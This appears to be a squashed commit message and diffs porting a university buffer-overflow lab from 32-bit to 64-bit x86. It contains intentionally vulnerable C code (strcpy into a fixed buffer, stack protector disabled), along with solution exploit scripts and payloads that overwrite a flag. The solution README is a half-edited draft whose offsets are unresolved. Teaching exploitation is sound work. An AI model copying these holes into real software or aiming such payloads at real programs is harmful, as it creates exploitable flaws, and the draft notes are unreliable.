labs/lab-10: ported lab to x64

labs/lab-10/data_buffer: ported data_buffer task to x64

labs/lab-10/stack-buffer: updated README for x64 bits

	- Changed 32-bit regs to 64-bit versions.
	- Added explanations for `part 3` of the exercise,
	- changed from `mov byte [ebx + TODO], TODO` to `mov dword [rbx + TODO],
	TODO`. We are writing an integer, so dword seems appropriate.

labs/lab-10/stack-buffer: ported task to x64

	- simple changes to register names + x64 calling conventions

labs/lab-10/stack-buffer: ported solution to x64:

	- simple changes to register names + x64 calling conventions

	- to solve todo3 it's the same like before, just use 64 bit registers in
	base+offset calculation.

	- to solve todo2 we need to print 84 bytes instead of 76 bytes, because
	the return stack frame and return address are 8 bytes instead of 4.

labs/lab-10/stack-buffer: fixed checker

	- Now checks for 84 bytes length instead of 76 bytes length. This is
	because old stack frame and return address are now 8 bytes instead of 4
	bytes.

labs/lab-10: updated payload from 4byte int to 8byte long

	- Changed the flag, we are on 64 bits so lets use some long long
	  vars
	- Added extra explanations in support/exploit.py to help the
	  student with strings in python

labs/lab-10/overflow-for-binary: Updated source file, makefile, README and the binary for the exercise to 64bits

	- Makefile: removed 32bit flags
	- overflow_in_binary.c: changed flag to 8 bytes long long,
	  changed win/lose printfs,
	  removed the random line of code (exercise is already pretty difficult)
	- overflow-for-binary: compiled the new binary (without -g
	  flags)

labs/lab-10/overflow-for-binary: update checker to check for different print string for "win" case

	- now the checker checks for "VICTORY!!!" instead of "Great success!"

labs/lab-10/overflow-for-binary: Update README file in solution/ , not final

	- When porting this ex to x64, ghidra seems to analyze the
	  binary in a weird way. e.g. variable named `local10`
	  is at the position of `stack - 10 bytes` in x86, but in
	  x64 `local10` is `stack - 8 bytes`.
	- analyzing the binary with `objdump -d -M intel` leads to more
	  accurate results and is preferrable
	- Consider moving this to support/ folder? What is the point of
	  the README if it doesn't help you solve the exercise?

labs/lab-10/read-stdin-gets: ported exercise to x64

	- source file: Changed .asm file to x64 calling conventions and register
	  names, added some useful explanations
	- Makefile: removed 32bit flags
	- exploit.py: added helpful explanations for strings in python

labs/lab-10/read-stdin-gets: Updated README

	- changed payload creation command from python2.7 to python3
	  because nobody uses python2.7
	- replaced 'gedit' with 'nano'

labs/lab-10/read-stdin-fgets: port task and README to x64

	- Change calling conventions and register names in .asm files
	- remove 32bit flags from Makefiles
	- change comments about 32bit calling conventions to 64bit
	  calling conventions in the README

labs/lab-10/overflow-in-c: added .asm and binary file as specified in README

	- In task README it says a binary and an .asm file would be
	already present, so I removed the .gitignore rule that was
	blocking that

labs/lab-10/overflow-in-c: upated READMEs with x64 register names and more appropriate
comments regarding 64bit executables

labs/lab-10/overflow-in-c: change payload to new payload in script and .txt

labs/lab-10/overflow-in-c: small modif in source file and remove 32bit
flag from makefile

	- do_overflow.c: add more padding to make the presence of this
	  buffer more significant, if only 5 byte size of padding then
	  it's completely pointless. The padding added by the compiler
	  (even without the presence of `in_between[5]`) eclipses
	  `in_between[5]`, so we make it `in_between[25]`
	- remove `-m32` flag from CC

labs/lab-10/overwrite-ret-addr: updated solution/README to x64, created
support/README to help the student complete task, updated python files

	- python files changed to fit the new sizes on the x64 stack
	- added helpful comments and tips in python files
	- added new support/README to help the student with this
	  unfamiliar workflow of analyzing binaries
	- changed solution/README to fit x64 conventions

	maybe consider deleting the solution/README and putting everything in
	support/README? P.S.: on the page online lab page on cs-pub-ro.github.io
	you can see the `writeup` which is solution/README (even if during the
	lab you would not want to get the solution spoiled)

labs/lab-10/overwrite-ret-addr: removed 32bit flags from Makefile

labs/lab-10/overwrite-ret-addr: bug present in break_this.c, compiled
binary

	- The buffer overflow works correctly, the return addr is
	  changed and the program flow goes into `magic_function`, but
	  it does not execute the system("cowsay...") part.
	- I placed a `puts("hi mom")` to show the function gets called
	- I do have cowsay installed on the system

labs/lab-10: fixed read-stdin-gets & read-stdin-fgets checkers

	- instead of checking exit code of python script as suggested,
	  changed the test_read_stdin_fgets.c test to pass if the
	  hard-coded string `var is 0x...` is found.
	  Before it checked to see if `CAFEBABE` (the initial value that
	  the task asks us to change) was not part of output
	  and in that case pass the test.
	- I don't find it necessary to check python exit code in test.
	  If the target .asm file does not compile (as mentioned in the
	  issue) the test will not pass now.

	Fixes #115

labs/lab-10/overwrite-ret-addr: change elf32 to elf64 in Makefile

labs/lab-10: Remove whitespaces for linter, remove overflow_in_c/ binary
and .asm files

	- let the student compile on their machine with `make`, this
	  shouldn't be a problem with x64 libs

Signed-off-by: Berevoesu Remus-Napoleon <berevoescu.remus@gmail.com>

Author: Expooo7

labs/lab-10/tasks/data-buffer/support/Makefile

@@ -5,9 +5,9 @@ RM = rm
 SRCS := $(shell find . -name "*.asm")
 OBJS := $(SRCS:.asm=.o)
 
-ASFLAGS ?= -f elf32 -F dwarf
+ASFLAGS ?= -f elf64 -F dwarf
 CFLAGS ?= -Wall
-LDFLAGS ?= -m32 -no-pie
+LDFLAGS ?= -no-pie
 
 TARGET_EXEC = data_buffer
 
@@ -20,4 +20,4 @@ $(OBJS): $(SRCS)
 .PHONY: clean
 
 clean:
-	$(RM) -r *.o $(TARGET_EXEC)
+	$(RM) -f *.o $(TARGET_EXEC)

labs/lab-10/tasks/data-buffer/support/data_buffer.asm

@@ -16,51 +16,47 @@ section .data
     null_string: db 0
 
 section .text
-
 global main
 
 main:
-    push ebp
-    mov ebp, esp
+    push rbp
+    mov rbp, rsp
 
     ; Fill data in buffer: buffer[i] = i + 1
     ; ecx is buffer index (i), dl is buffer value (i + 1). dl needs to be ecx + 1.
     ; Buffer length is 64 bytes.
-    xor ecx, ecx
+    xor rcx, rcx
 fill_byte:
     mov dl, cl
     inc dl
-    mov byte [buffer + ecx], dl
-    inc ecx
-    cmp ecx, len
+    mov byte [buffer + rcx], dl
+    inc rcx
+    cmp rcx, len
     jl fill_byte
 
-    ; Text before printing buffer.
-    push buffer_intro_message
+    ; printf("buffer is:");
+    xor rax, rax                    ; required for variadic functions
+    mov rdi, buffer_intro_message   ; 1st arg
     call printf
-    add esp, 4
 
-    xor ecx, ecx
+    xor rcx, rcx
 print_byte:
-    xor eax, eax
-    mov al, byte[buffer + ecx]
-    push ecx	; save ecx, printf may change it
+    mov rdi, byte_format            ; 1st arg (format)
+    xor rsi, rsi                    ; clear rsi
+    mov sil, byte [buffer + rcx]    ; 2nd arg (value)
+    xor rax, rax                    ; variadic call requirement
 
-    ; Print current byte.
-    push eax
-    push byte_format
+    push rcx                        ; save rcx (caller-saved)
     call printf
-    add esp, 8
+    pop rcx                         ; restore rcx
 
-    pop ecx	; restore ecx
-    inc ecx
-    cmp ecx, len
+    inc rcx
+    cmp rcx, len
     jl print_byte
 
     ; Print new line. C equivalent instruction is puts("").
-    push null_string
+    mov rdi, null_string
     call puts
-    add esp, 4
 
     leave
-    ret
+    ret

labs/lab-10/tasks/overflow-for-binary/solution/Makefile

@@ -8,9 +8,9 @@ OBJS_ASM := $(SRCS_ASM:.asm=.o)
 SRCS_C := $(wildcard *.c)
 OBJS_C := $(SRCS_C:.c=.o)
 
-ASFLAGS ?= -f elf32 -F dwarf
-CFLAGS ?= -m32 -g -Wall -Wextra -Werror -fno-pic -masm=intel -fno-stack-protector
-LDFLAGS ?= -m32 -no-pie
+ASFLAGS ?= -f elf64 -F dwarf
+CFLAGS ?= -Wall -Wextra -Werror -fno-pic -masm=intel -fno-stack-protector
+LDFLAGS ?= -no-pie
 
 TARGET_EXEC = overflow_in_binary
 

labs/lab-10/tasks/overflow-for-binary/solution/README.md

@@ -11,7 +11,7 @@ parent: 'Task: Buffer Overflow for Binary'
 
 In `check_string()`:
 
-- `local_10` must be set to `0x4E305250` to call `win()` (carefully, use the little-endian encoding)
-- `local_10` is stored at stack - `0x10`
-- The buffer is stored at `stack - 0x30`
-- So the payload should consist of `32 (48 - 16)` `'A'` characters, followed by `"\x50\x52\x30\x4E"`
+- `local_10` must be set to `0x52413342494c3056` to call `win()` (carefully, use the little-endian encoding)
+- `local_10` is stored at `stack - 0x10`   ??? sau `stack - 0x8`
+- The buffer is stored at `stack - 0x30`   ??? sau `stack - 0x28`
+- So the payload should consist of `32 (48 - 16)` `'A'` characters, followed by `"\x50\x52\x30\x4E"`    <-- change this

labs/lab-10/tasks/overflow-for-binary/solution/exploit.py

@@ -3,7 +3,8 @@
 
 
 def run_executable():
-    argument = 32 * "A" + "\x50\x52\x30\x4e"
+
+    argument = 40 * 'A' + '\x56\x30\x4c\x49\x42\x33\x41\x52'
     subprocess.run(["./overflow_in_binary", argument])
 
 

labs/lab-10/tasks/overflow-for-binary/solution/overflow_in_binary.c

@@ -6,23 +6,22 @@
 
 static void win(void)
 {
-	puts("Great success!");
+	puts("VICTORY!!!");
 }
 
 static void fail(void)
 {
-	puts("Epic failure!");
+	puts("defeat!");
 }
 
 static void check_string(const char *str)
 {
-	unsigned int flag = 0x12345678;
+	unsigned long long flag = 0xCAFEBABE12345678;
 	char buffer[32];
 
 	strcpy(buffer, str);
-	buffer[15] = str[1];
 
-	if (flag == 0x4e305250)
+	if (flag == 0x52413342494C3056)  // 0x52 41 33 42	49 4C 30 56
 		win();
 	else
 		fail();

labs/lab-10/tasks/overflow-for-binary/solution/payload

@@ -1 +1 @@
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPR0N
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAV0LIB3AR

labs/lab-10/tasks/overflow-for-binary/support/exploit.py

@@ -3,7 +3,14 @@
 
 
 def run_executable():
+
     argument = ""  # TODO: Put here the payload you have discovered
+
+    # Pro Tip: in python you can use `5 * 'A'` as shorthand for "AAAAA"
+    # then concatenate with `+` operator
+    # e.g.: 5 * 'A' + '\x45\x4f\x59' = "AAAAAHOY"
+    # those are ascii characters in hex encoding!
+
     subprocess.run(["./overflow_in_binary", argument])
 
 

labs/lab-10/tasks/overflow-for-binary/support/overflow_in_binary

@@ -5,7 +5,7 @@
 source ./graded_test.inc.sh
 
 test_exploit() {
-	if ( cd ../support && python3 exploit.py | grep -q "Great success!" ); then
+	if ( cd ../support && python3 exploit.py | grep -q VICTORY!!! ); then
 		return 1
 	else
 		return 0